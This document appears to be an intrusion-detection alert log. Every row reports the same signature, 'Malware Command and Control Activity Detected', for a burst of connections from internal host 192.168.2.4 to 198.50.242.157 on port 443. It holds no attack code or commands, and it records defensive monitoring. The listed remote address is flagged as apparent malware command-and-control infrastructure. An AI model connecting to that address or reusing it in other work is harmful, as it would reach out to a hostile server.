2025-01-11T20:08:05.794999+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50588	198.50.242.157	443	TCP
2025-01-11T20:08:05.796565+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50589	198.50.242.157	443	TCP
2025-01-11T20:08:05.798384+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50591	198.50.242.157	443	TCP
2025-01-11T20:08:05.800112+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50592	198.50.242.157	443	TCP
2025-01-11T20:08:05.801139+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50593	198.50.242.157	443	TCP
2025-01-11T20:08:05.802789+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50594	198.50.242.157	443	TCP
2025-01-11T20:08:05.803904+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50595	198.50.242.157	443	TCP
2025-01-11T20:08:05.806667+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50596	198.50.242.157	443	TCP
2025-01-11T20:08:05.815555+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50597	198.50.242.157	443	TCP
2025-01-11T20:08:05.818038+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50598	198.50.242.157	443	TCP
2025-01-11T20:08:05.820496+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50600	198.50.242.157	443	TCP
2025-01-11T20:08:05.822182+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50601	198.50.242.157	443	TCP
2025-01-11T20:08:05.823518+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50602	198.50.242.157	443	TCP
2025-01-11T20:08:05.824582+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50603	198.50.242.157	443	TCP
2025-01-11T20:08:05.826264+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50604	198.50.242.157	443	TCP
2025-01-11T20:08:05.827806+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50605	198.50.242.157	443	TCP
2025-01-11T20:08:05.829479+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50606	198.50.242.157	443	TCP
2025-01-11T20:08:05.830733+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50607	198.50.242.157	443	TCP
2025-01-11T20:08:05.832031+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50608	198.50.242.157	443	TCP
2025-01-11T20:08:05.835215+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50610	198.50.242.157	443	TCP
2025-01-11T20:08:05.837701+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50612	198.50.242.157	443	TCP
2025-01-11T20:08:05.840576+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50613	198.50.242.157	443	TCP
2025-01-11T20:08:05.841790+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50614	198.50.242.157	443	TCP
2025-01-11T20:08:05.843886+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50615	198.50.242.157	443	TCP
2025-01-11T20:08:05.844993+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50616	198.50.242.157	443	TCP
2025-01-11T20:08:05.846840+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50617	198.50.242.157	443	TCP
2025-01-11T20:08:05.848371+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50618	198.50.242.157	443	TCP
2025-01-11T20:08:05.850503+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50619	198.50.242.157	443	TCP
2025-01-11T20:08:05.852077+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50620	198.50.242.157	443	TCP
2025-01-11T20:08:05.853449+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50621	198.50.242.157	443	TCP
2025-01-11T20:08:05.856183+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50623	198.50.242.157	443	TCP
2025-01-11T20:08:05.857704+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50624	198.50.242.157	443	TCP
2025-01-11T20:08:05.858977+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50625	198.50.242.157	443	TCP
2025-01-11T20:08:05.860892+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50626	198.50.242.157	443	TCP
2025-01-11T20:08:05.862828+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50627	198.50.242.157	443	TCP
2025-01-11T20:08:05.864228+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50628	198.50.242.157	443	TCP
2025-01-11T20:08:05.866057+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50629	198.50.242.157	443	TCP
2025-01-11T20:08:05.866957+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50630	198.50.242.157	443	TCP
2025-01-11T20:08:05.868379+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50631	198.50.242.157	443	TCP
2025-01-11T20:08:05.869689+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50632	198.50.242.157	443	TCP
2025-01-11T20:08:05.870839+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50633	198.50.242.157	443	TCP
2025-01-11T20:08:05.872170+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50634	198.50.242.157	443	TCP
2025-01-11T20:08:05.873960+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50635	198.50.242.157	443	TCP
2025-01-11T20:08:05.874979+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50636	198.50.242.157	443	TCP
2025-01-11T20:08:05.877452+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50637	198.50.242.157	443	TCP
2025-01-11T20:08:05.881053+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50639	198.50.242.157	443	TCP
2025-01-11T20:08:05.885678+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50640	198.50.242.157	443	TCP
2025-01-11T20:08:05.887050+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50641	198.50.242.157	443	TCP
2025-01-11T20:08:05.890914+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50644	198.50.242.157	443	TCP
2025-01-11T20:08:05.892061+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50645	198.50.242.157	443	TCP
2025-01-11T20:08:05.893841+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50646	198.50.242.157	443	TCP
2025-01-11T20:08:05.896271+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50648	198.50.242.157	443	TCP
2025-01-11T20:08:05.900569+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50651	198.50.242.157	443	TCP
2025-01-11T20:08:05.902058+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50652	198.50.242.157	443	TCP
2025-01-11T20:08:05.903645+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50653	198.50.242.157	443	TCP
2025-01-11T20:08:05.905605+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50654	198.50.242.157	443	TCP
2025-01-11T20:08:05.907129+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50655	198.50.242.157	443	TCP
2025-01-11T20:08:05.908348+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50656	198.50.242.157	443	TCP
2025-01-11T20:08:05.909499+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50657	198.50.242.157	443	TCP
2025-01-11T20:08:05.910725+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50658	198.50.242.157	443	TCP
2025-01-11T20:08:05.912091+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50659	198.50.242.157	443	TCP
2025-01-11T20:08:05.920200+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50660	198.50.242.157	443	TCP
2025-01-11T20:08:05.937224+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50661	198.50.242.157	443	TCP
2025-01-11T20:08:05.938975+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50662	198.50.242.157	443	TCP
2025-01-11T20:08:05.940387+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50663	198.50.242.157	443	TCP
2025-01-11T20:08:05.941816+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50664	198.50.242.157	443	TCP
2025-01-11T20:08:05.943856+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50666	198.50.242.157	443	TCP
2025-01-11T20:08:05.944841+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50667	198.50.242.157	443	TCP
2025-01-11T20:08:05.945794+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50668	198.50.242.157	443	TCP
2025-01-11T20:08:05.946967+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50669	198.50.242.157	443	TCP
2025-01-11T20:08:05.948019+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50670	198.50.242.157	443	TCP
2025-01-11T20:08:05.948988+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50671	198.50.242.157	443	TCP
2025-01-11T20:08:05.949946+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50672	198.50.242.157	443	TCP
2025-01-11T20:08:05.950985+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50673	198.50.242.157	443	TCP
2025-01-11T20:08:05.952090+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50674	198.50.242.157	443	TCP
2025-01-11T20:08:05.953385+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50675	198.50.242.157	443	TCP
2025-01-11T20:08:05.954258+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50676	198.50.242.157	443	TCP
2025-01-11T20:08:05.957912+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50679	198.50.242.157	443	TCP
2025-01-11T20:08:05.958939+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50680	198.50.242.157	443	TCP
2025-01-11T20:08:05.959950+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50681	198.50.242.157	443	TCP
2025-01-11T20:08:05.960856+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50682	198.50.242.157	443	TCP
2025-01-11T20:08:05.962027+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50683	198.50.242.157	443	TCP
2025-01-11T20:08:05.962838+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50684	198.50.242.157	443	TCP
2025-01-11T20:08:05.963923+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50685	198.50.242.157	443	TCP
2025-01-11T20:08:05.964900+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50686	198.50.242.157	443	TCP
2025-01-11T20:08:05.966355+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50687	198.50.242.157	443	TCP
2025-01-11T20:08:05.967221+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50688	198.50.242.157	443	TCP
2025-01-11T20:08:05.968268+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50689	198.50.242.157	443	TCP
2025-01-11T20:08:05.969218+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50690	198.50.242.157	443	TCP
2025-01-11T20:08:05.971034+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50692	198.50.242.157	443	TCP
2025-01-11T20:08:05.972010+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50693	198.50.242.157	443	TCP
2025-01-11T20:08:05.973052+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50694	198.50.242.157	443	TCP
2025-01-11T20:08:05.974020+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50695	198.50.242.157	443	TCP
2025-01-11T20:08:05.974954+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50696	198.50.242.157	443	TCP
2025-01-11T20:08:05.975777+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50697	198.50.242.157	443	TCP
2025-01-11T20:08:05.977689+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50699	198.50.242.157	443	TCP
2025-01-11T20:08:05.979940+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50701	198.50.242.157	443	TCP
2025-01-11T20:08:05.980775+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50702	198.50.242.157	443	TCP
2025-01-11T20:08:05.981933+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50703	198.50.242.157	443	TCP
2025-01-11T20:08:05.982875+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50704	198.50.242.157	443	TCP
2025-01-11T20:08:05.983777+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50705	198.50.242.157	443	TCP
2025-01-11T20:08:05.984967+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50706	198.50.242.157	443	TCP
2025-01-11T20:08:05.985769+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50707	198.50.242.157	443	TCP
2025-01-11T20:08:05.986662+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50708	198.50.242.157	443	TCP
2025-01-11T20:08:05.987488+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50709	198.50.242.157	443	TCP
2025-01-11T20:08:05.988315+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50710	198.50.242.157	443	TCP
2025-01-11T20:08:05.989315+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50711	198.50.242.157	443	TCP
2025-01-11T20:08:05.990306+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50712	198.50.242.157	443	TCP
2025-01-11T20:08:05.993120+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50715	198.50.242.157	443	TCP
2025-01-11T20:08:05.995155+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50717	198.50.242.157	443	TCP
2025-01-11T20:08:05.996066+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50718	198.50.242.157	443	TCP
2025-01-11T20:08:05.997601+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50719	198.50.242.157	443	TCP
2025-01-11T20:08:05.999805+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50721	198.50.242.157	443	TCP
2025-01-11T20:08:06.000629+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50722	198.50.242.157	443	TCP
2025-01-11T20:08:06.003057+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50724	198.50.242.157	443	TCP
2025-01-11T20:08:06.004166+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50725	198.50.242.157	443	TCP
2025-01-11T20:08:06.005161+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50726	198.50.242.157	443	TCP
2025-01-11T20:08:06.005977+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50727	198.50.242.157	443	TCP
2025-01-11T20:08:06.007297+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50728	198.50.242.157	443	TCP
2025-01-11T20:08:06.008107+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50729	198.50.242.157	443	TCP
2025-01-11T20:08:06.010642+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50732	198.50.242.157	443	TCP
2025-01-11T20:08:06.013716+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50735	198.50.242.157	443	TCP
2025-01-11T20:08:06.016097+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50737	198.50.242.157	443	TCP
2025-01-11T20:08:06.018215+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50739	198.50.242.157	443	TCP
2025-01-11T20:08:06.019254+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50740	198.50.242.157	443	TCP
2025-01-11T20:08:06.020098+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50741	198.50.242.157	443	TCP
2025-01-11T20:08:06.021198+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50742	198.50.242.157	443	TCP
2025-01-11T20:08:06.022099+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50743	198.50.242.157	443	TCP
2025-01-11T20:08:06.023099+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50744	198.50.242.157	443	TCP
2025-01-11T20:08:06.024071+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50745	198.50.242.157	443	TCP
2025-01-11T20:08:06.025203+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50746	198.50.242.157	443	TCP
2025-01-11T20:08:06.026124+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50747	198.50.242.157	443	TCP
2025-01-11T20:08:06.026990+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50748	198.50.242.157	443	TCP
2025-01-11T20:08:06.028060+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50749	198.50.242.157	443	TCP
2025-01-11T20:08:06.030276+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50751	198.50.242.157	443	TCP
2025-01-11T20:08:06.032511+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50753	198.50.242.157	443	TCP
2025-01-11T20:08:06.033553+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50754	198.50.242.157	443	TCP
2025-01-11T20:08:06.034369+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50755	198.50.242.157	443	TCP
2025-01-11T20:08:06.035354+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50756	198.50.242.157	443	TCP
2025-01-11T20:08:06.036996+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50758	198.50.242.157	443	TCP
2025-01-11T20:08:06.037849+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50759	198.50.242.157	443	TCP
2025-01-11T20:08:06.038694+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50760	198.50.242.157	443	TCP
2025-01-11T20:08:06.039768+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50761	198.50.242.157	443	TCP
2025-01-11T20:08:06.040529+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50762	198.50.242.157	443	TCP
2025-01-11T20:08:06.041406+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50763	198.50.242.157	443	TCP
2025-01-11T20:08:06.042148+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50764	198.50.242.157	443	TCP
2025-01-11T20:08:06.043162+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50765	198.50.242.157	443	TCP
2025-01-11T20:08:06.045161+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50767	198.50.242.157	443	TCP
2025-01-11T20:08:06.046207+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50768	198.50.242.157	443	TCP
2025-01-11T20:08:06.046946+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50769	198.50.242.157	443	TCP
2025-01-11T20:08:06.048077+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50770	198.50.242.157	443	TCP
2025-01-11T20:08:06.050106+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50772	198.50.242.157	443	TCP
2025-01-11T20:08:06.051703+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50774	198.50.242.157	443	TCP
2025-01-11T20:08:06.052584+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50775	198.50.242.157	443	TCP
2025-01-11T20:08:06.055171+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50777	198.50.242.157	443	TCP
2025-01-11T20:08:06.056428+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50778	198.50.242.157	443	TCP
2025-01-11T20:08:06.059750+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50780	198.50.242.157	443	TCP
2025-01-11T20:08:06.061735+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50781	198.50.242.157	443	TCP
2025-01-11T20:08:06.070189+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50783	198.50.242.157	443	TCP
2025-01-11T20:08:06.072108+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50784	198.50.242.157	443	TCP
2025-01-11T20:08:06.082825+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50786	198.50.242.157	443	TCP
2025-01-11T20:08:06.086806+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50789	198.50.242.157	443	TCP
2025-01-11T20:08:06.090491+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50792	198.50.242.157	443	TCP
2025-01-11T20:08:06.092990+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50794	198.50.242.157	443	TCP
2025-01-11T20:08:06.093978+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50795	198.50.242.157	443	TCP
2025-01-11T20:08:06.095119+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50796	198.50.242.157	443	TCP
2025-01-11T20:08:06.096596+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50797	198.50.242.157	443	TCP
2025-01-11T20:08:06.097571+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50798	198.50.242.157	443	TCP
2025-01-11T20:08:06.101374+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50801	198.50.242.157	443	TCP
2025-01-11T20:08:06.106426+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50802	198.50.242.157	443	TCP
2025-01-11T20:08:06.107958+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50803	198.50.242.157	443	TCP
2025-01-11T20:08:06.108966+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50804	198.50.242.157	443	TCP
2025-01-11T20:08:06.112920+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50807	198.50.242.157	443	TCP
2025-01-11T20:08:06.113890+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50808	198.50.242.157	443	TCP
2025-01-11T20:08:06.116548+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50810	198.50.242.157	443	TCP
2025-01-11T20:08:06.119699+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50812	198.50.242.157	443	TCP
2025-01-11T20:08:06.121198+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50813	198.50.242.157	443	TCP
2025-01-11T20:08:06.129553+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50816	198.50.242.157	443	TCP
2025-01-11T20:08:06.134701+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50820	198.50.242.157	443	TCP
2025-01-11T20:08:06.139027+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50823	198.50.242.157	443	TCP
2025-01-11T20:08:06.141242+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50825	198.50.242.157	443	TCP
2025-01-11T20:08:06.142800+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50826	198.50.242.157	443	TCP
2025-01-11T20:08:06.143907+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50827	198.50.242.157	443	TCP
2025-01-11T20:08:06.146962+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50829	198.50.242.157	443	TCP
2025-01-11T20:08:06.151502+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50830	198.50.242.157	443	TCP
2025-01-11T20:08:06.153222+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50832	198.50.242.157	443	TCP
2025-01-11T20:08:06.155296+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50833	198.50.242.157	443	TCP
2025-01-11T20:08:06.160770+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50837	198.50.242.157	443	TCP
2025-01-11T20:08:06.164027+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50839	198.50.242.157	443	TCP
2025-01-11T20:08:06.166467+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50841	198.50.242.157	443	TCP
2025-01-11T20:08:06.167686+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50842	198.50.242.157	443	TCP
2025-01-11T20:08:06.168790+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50843	198.50.242.157	443	TCP
2025-01-11T20:08:06.169908+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50844	198.50.242.157	443	TCP
2025-01-11T20:08:06.173805+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50845	198.50.242.157	443	TCP
2025-01-11T20:08:06.177731+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50848	198.50.242.157	443	TCP
2025-01-11T20:08:06.179034+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50849	198.50.242.157	443	TCP
2025-01-11T20:08:06.180524+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50850	198.50.242.157	443	TCP
2025-01-11T20:08:06.181737+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50851	198.50.242.157	443	TCP
2025-01-11T20:08:06.184400+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50853	198.50.242.157	443	TCP
2025-01-11T20:08:06.185774+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50854	198.50.242.157	443	TCP
2025-01-11T20:08:06.189003+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50856	198.50.242.157	443	TCP
2025-01-11T20:08:06.193534+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50858	198.50.242.157	443	TCP
2025-01-11T20:08:06.198412+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50861	198.50.242.157	443	TCP
2025-01-11T20:08:06.199619+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50862	198.50.242.157	443	TCP
2025-01-11T20:08:06.203104+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50865	198.50.242.157	443	TCP
2025-01-11T20:08:06.204005+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50866	198.50.242.157	443	TCP
2025-01-11T20:08:06.206515+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50868	198.50.242.157	443	TCP
2025-01-11T20:08:06.207502+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50869	198.50.242.157	443	TCP
2025-01-11T20:08:06.208912+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50870	198.50.242.157	443	TCP
2025-01-11T20:08:06.211485+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50871	198.50.242.157	443	TCP
2025-01-11T20:08:06.215489+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50872	198.50.242.157	443	TCP
2025-01-11T20:08:06.218362+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50874	198.50.242.157	443	TCP
2025-01-11T20:08:06.223109+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50877	198.50.242.157	443	TCP
2025-01-11T20:08:06.224849+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50878	198.50.242.157	443	TCP
2025-01-11T20:08:06.229788+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50879	198.50.242.157	443	TCP
2025-01-11T20:08:06.232850+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50881	198.50.242.157	443	TCP
2025-01-11T20:08:06.234041+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50882	198.50.242.157	443	TCP
2025-01-11T20:08:06.244439+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50887	198.50.242.157	443	TCP
2025-01-11T20:08:06.247832+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50890	198.50.242.157	443	TCP
2025-01-11T20:08:06.249050+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50891	198.50.242.157	443	TCP
2025-01-11T20:08:06.256648+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50898	198.50.242.157	443	TCP
2025-01-11T20:08:06.261866+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50899	198.50.242.157	443	TCP
2025-01-11T20:08:06.267422+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50901	198.50.242.157	443	TCP
2025-01-11T20:08:06.270640+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50903	198.50.242.157	443	TCP
2025-01-11T20:08:06.284846+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50908	198.50.242.157	443	TCP
2025-01-11T20:08:06.288379+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50911	198.50.242.157	443	TCP
2025-01-11T20:08:06.289894+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50912	198.50.242.157	443	TCP
2025-01-11T20:08:06.291224+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50913	198.50.242.157	443	TCP
2025-01-11T20:08:06.295350+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50917	198.50.242.157	443	TCP
2025-01-11T20:08:06.299445+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	50921	198.50.242.157	443	TCP
